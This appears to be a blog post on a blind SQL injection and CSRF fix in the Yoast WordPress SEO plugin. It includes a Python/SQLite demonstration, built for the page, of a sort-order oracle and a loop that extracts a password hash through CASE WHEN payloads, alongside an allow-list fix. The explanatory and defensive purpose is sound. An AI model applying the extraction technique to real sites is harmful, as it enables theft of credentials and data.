Over a million WordPress sites have been exposed to a blind SQL injection vulnerability through a security hole in the very popular Yoast WordPress SEO plugin. The makers have released a fixed version, so make sure to update your plugin as soon as possible.
The Yoast WordPress SEO plugin is installed on over a million WordPress websites (see its download figures) and has reportedly been open to a blind SQL injection attack for goodness knows how long.
A blind SQL injection is a type of SQL injection attack in which the attacker asks the database true-or-false questions and reads the answer from the application's behaviour (a different page, a different sort order, or a different response time) rather than from an error message. It is the technique of choice when the web application has been configured to show only generic error messages but the code that is vulnerable to injection has not itself been fixed.
Depending on where the injection lands, it can be used to extract data, or to modify or delete it. On WordPress sites it is most often used to plant unwanted or unauthorized affiliate links, spam links, or malware/adware. These are the little nasties that you don't notice for ages, unless you have a malware scan running…
To fix the issue, upgrade to version 1.7.4 immediately.
This release is documented as a security fix for the issue that Ryan Dewhurst of WPScan found and reported. For the geeks and techies among us, the official changelog entry reads:
Security fix: fixed possible CSRF and blind SQL injection vulnerabilities in bulk editor. Added strict sanitation to order_by and order params. Added extra nonce checks on requests sending additional parameters. Minimal capability needed to access the bulk editor is now Editor. Thanks Ryan Dewhurst from WPScan for discovering and responsibly disclosing this issue.
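To make the two points above concrete (the true-or-false oracle in the definition of blind SQL injection, and the strict sanitisation of the order_by and order parameters that the changelog describes), here is an added example written for this page. It is a Python/SQLite model, not the plugin's PHP code: the posts and users tables, the sample rows, the "bulk editor" style listing functions and the secret that leaks are all constructed for the illustration. The vulnerable function splices the sort parameters straight into ORDER BY; the oracle turns the resulting sort order into a yes/no answer and reads a secret out character by character; the hardened function shows the allow-list fix.

```python
import sqlite3


def make_db():
    """Build an in-memory SQLite database with constructed sample rows.

    The schema and data are invented for this illustration; they are not
    WordPress or Yoast tables.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO posts (id, title) VALUES (?, ?)",
                     [(1, "Zebra"), (2, "Apple"), (3, "Mango")])
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, pass_hash TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'h4x')")  # constructed secret
    return conn


def list_posts_vulnerable(conn, order_by, order):
    """Vulnerable listing: request parameters are spliced into ORDER BY.

    Identifiers cannot be bound as query parameters, so developers are
    tempted to concatenate them; without an allow-list the caller controls
    an arbitrary SQL expression.
    """
    sql = f"SELECT id FROM posts ORDER BY {order_by} {order}"
    return [row[0] for row in conn.execute(sql)]


class Oracle:
    """Turns the sort order of the listing into a yes/no answer."""

    def __init__(self, conn):
        self.conn = conn
        self.queries = 0

    def ask(self, condition):
        # If the condition holds, the rows sort by id (1, 2, 3); otherwise
        # by title (Apple, Mango, Zebra -> 2, 3, 1). No error text is needed.
        self.queries += 1
        payload = f"(CASE WHEN ({condition}) THEN id ELSE title END)"
        return list_posts_vulnerable(self.conn, payload, "ASC") == [1, 2, 3]


def extract_secret(oracle, max_len=32):
    """Recover the admin's pass_hash one character at a time.

    Returns (secret, number_of_requests). Each character costs up to one
    request per alphabet symbol, which is why blind injection is noisy in
    access logs: look for many near-identical requests that differ only
    in the sort parameters.
    """
    alphabet = "0123456789abcdefghijklmnopqrstuvwxyz"
    target = "(SELECT pass_hash FROM users WHERE login = 'admin')"
    secret = ""
    for pos in range(1, max_len + 1):
        if oracle.ask(f"length({target}) < {pos}"):
            break  # past the end of the string
        for ch in alphabet:
            if oracle.ask(f"substr({target}, {pos}, 1) = '{ch}'"):
                secret += ch
                break
        else:
            raise RuntimeError("character outside the search alphabet")
    return secret, oracle.queries


ALLOWED_COLUMNS = {"id", "title"}
ALLOWED_ORDER = {"ASC", "DESC"}


def list_posts_hardened(conn, order_by, order):
    """Hardened listing: parameters are matched against a fixed allow-list.

    Only values that exactly equal one of our own constants reach the SQL
    text, so no expression can be smuggled into ORDER BY.
    """
    if order_by not in ALLOWED_COLUMNS:
        raise ValueError(f"invalid order_by: {order_by!r}")
    direction = order.upper()
    if direction not in ALLOWED_ORDER:
        raise ValueError(f"invalid order: {order!r}")
    sql = f"SELECT id FROM posts ORDER BY {order_by} {direction}"
    return [row[0] for row in conn.execute(sql)]


if __name__ == "__main__":
    db = make_db()
    print("normal:", list_posts_vulnerable(db, "title", "ASC"))
    print("leaked:", extract_secret(Oracle(db)))
    try:
        list_posts_hardened(db, "(CASE WHEN 1=1 THEN id ELSE title END)", "ASC")
    except ValueError as err:
        print("rejected:", err)
```

The same shape of fix applies in the plugin's PHP: compare the request values against a fixed list of column names and directions (WordPress core ships sanitize_sql_orderby() for exactly this), and, as the changelog says, verify a nonce and require an adequate capability before serving the request at all. Escaping alone does not help here, because the injected value is an identifier or expression, not a string literal.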
From Yoast in email this morning:
On Wednesday we pushed a security release to our WordPress SEO plugin. Joost wrote about what we fixed and how we rolled out the update in this post. In short, if you haven’t updated your WordPress SEO plugin yet, free or premium, update!
Yoast also announced that the WordPress.org team pushed an automatic update to installs running an older version of this plugin, so many affected sites should already have been updated without any action from their owners.
But go ahead and log in to your site anyway and double-check the installed plugin version…